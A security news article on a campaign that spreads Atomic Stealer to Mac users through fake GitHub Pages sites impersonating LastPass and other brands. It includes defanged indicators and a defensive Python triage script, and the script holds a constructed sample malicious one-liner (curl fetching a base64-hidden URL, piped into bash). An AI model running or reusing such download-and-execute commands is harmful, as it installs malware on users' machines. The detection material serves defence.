- Atomic Stealer malware is silently installed through fake GitHub pages aimed at Mac users
- The attackers create multiple GitHub accounts to evade takedowns
- Users who copy and paste commands from untrusted websites risk severe system compromise
Cybersecurity researchers are warning Apple Mac users about a campaign that uses fraudulent GitHub repositories to spread infostealer malware.
Research by LastPass's Threat Intelligence, Mitigation, and Escalation (TIME) team found that the attackers are impersonating well-known companies to persuade people to download fake Mac software.
Two fraudulent GitHub Pages sites claiming to offer LastPass for Mac were first seen on September 16, 2025, under the username “Methopmduck476”.
How the attack chain works
While those particular pages have since been taken down, the incident points to a broader pattern that continues to evolve.
The fake GitHub pages carried links labeled “Install LastPass on MacBook”, which redirected to hxxps://ahoastock825[.]github[.]io/.github/Lastpass.
From there, users were sent to macprograms-pro[.]com/mac-git-2-download.html and told to paste a command into the Terminal on their Mac.
That command used curl to fetch a base64-encoded URL that decoded to bonoud[.]com/get3/install.sh.
The script then downloaded a payload named “Update” into the temp directory, which installed Atomic Stealer (the AMOS malware).
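The "paste this into Terminal" step is the point where a defender can still intervene, because the one-liner has to be readable by the victim's shell. As an added example (not from the LastPass report or its tooling), the Python script below triages a command of that shape: it decodes any base64 blobs to recover the hidden URL and flags the curl-or-wget-piped-into-a-shell pattern. The sample commands, the reserved example.invalid domain and all function names are constructed for illustration and are not indicators from the campaign.

```python
"""
Triage helper for "paste this into Terminal" one-liners of the kind used in
the chain above. This is an added example, not LastPass's code or tooling.
It decodes any base64 blobs in a command, extracts URLs hidden in them, and
flags the download-and-execute pattern (curl/wget output piped into a shell).
The sample commands and the example.invalid domain below are constructed for
illustration and are not indicators from the campaign.
"""
import base64
import binascii
import os
import re
import sys
from dataclasses import dataclass, field

# Base64 runs long enough to plausibly carry a URL; shorter tokens are ignored
# so ordinary words and flags do not trigger decoding attempts.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.IGNORECASE)
DECODE_RE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
SHELLS = {"sh", "bash", "zsh", "ksh", "dash"}


@dataclass
class Verdict:
    suspicious: bool = False
    reasons: list = field(default_factory=list)
    decoded_urls: list = field(default_factory=list)


def decode_blobs(cmd):
    """Return printable UTF-8 strings recovered from base64 blobs in cmd."""
    found = []
    for blob in B64_RE.findall(cmd):
        padded = blob + "=" * (-len(blob) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            found.append(text)
    return found


def pipes_download_into_shell(cmd):
    """True if a curl/wget stage feeds a shell interpreter as the final stage."""
    stages = [s.strip() for s in cmd.split("|")]
    if len(stages) < 2 or not stages[-1]:
        return False
    tokens = stages[-1].split()
    if tokens[0] == "sudo" and len(tokens) > 1:
        tokens = tokens[1:]
    interp = os.path.basename(tokens[0])
    return interp in SHELLS and any(DOWNLOADER_RE.search(s) for s in stages[:-1])


def triage_command(cmd):
    """Score one command line; every reason is reported so an analyst can verify."""
    v = Verdict()
    if pipes_download_into_shell(cmd):
        v.reasons.append("downloader output piped straight into a shell")
    if DECODE_RE.search(cmd):
        v.reasons.append("base64 decoded at run time (obfuscated argument)")
    for text in decode_blobs(cmd):
        for url in URL_RE.findall(text):
            v.decoded_urls.append(url)
            v.reasons.append(f"URL hidden in base64: {url}")
    v.suspicious = bool(v.reasons)
    return v


# Constructed samples. The hidden URL uses the reserved example.invalid domain;
# the encoding is done here so the sample stays readable.
SAMPLE_HIDDEN_URL = "https://example.invalid/get3/install.sh"
_encoded = base64.b64encode(SAMPLE_HIDDEN_URL.encode()).decode()
SAMPLE_MALICIOUS = f'curl -fsSL "$(echo {_encoded} | base64 -d)" | bash'
SAMPLE_BENIGN = "brew install --cask 1password"


if __name__ == "__main__":
    # Read commands (for example, lines from a shell history file) from stdin.
    for line in sys.stdin:
        verdict = triage_command(line.rstrip("\n"))
        if verdict.suspicious:
            print("SUSPICIOUS:", line.rstrip("\n"))
            for reason in verdict.reasons:
                print("   -", reason)
```

Fed a shell history file on stdin (for example `python3 triage.py < ~/.zsh_history`), the script lists lines that match the pattern together with the decoded URL, which is the value you want to compare against published indicators. The heuristics are deliberately loud rather than precise: a decoded URL and a pipe into a shell are reported separately so an analyst can see which part of the one-liner tripped the check.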
Atomic Stealer, active since April 2023, is a well-known infostealer used by financially motivated criminal groups.
The researchers have linked this campaign to many other fake repositories impersonating companies ranging from financial institutions to productivity applications.
The list of impersonated names includes 1Password, Robinhood, Citibank, Docker, Shopify, Basecamp and many others.
The attackers appear to create multiple GitHub usernames to evade takedowns, and use search engine optimization to push their malicious links up the results in Google and Bing.
This raises the odds that Mac users searching for legitimate downloads land on the fraudulent pages first.
LastPass says it is “actively monitoring this campaign” while pursuing takedowns and sharing indicators of compromise to help others detect the threat.
The attackers' use of GitHub Pages highlights both the convenience and the risks of community platforms.
Fraudulent repositories can be set up quickly, and although GitHub can remove them, the attackers often return under new aliases.
This cycle raises questions about how effectively such platforms can protect users.
How to stay safe
- Only download software from verified sources to avoid malware and ransomware.
- Never paste commands from unfamiliar websites into Terminal; doing so runs unauthorized code with your own privileges.
- Keep macOS and all installed software up to date to reduce exploitable vulnerabilities.
- Use reputable antivirus or security software that includes ransomware protection to block threats.
- Enable regular system backups so files can be recovered after a ransomware or malware attack.
- Stay skeptical of unexpected links, emails and pop-up windows to minimize exposure.
- Monitor official notices from trusted vendors for updates and security guidance.
- Set strong, unique passwords and enable two-factor authentication on important accounts.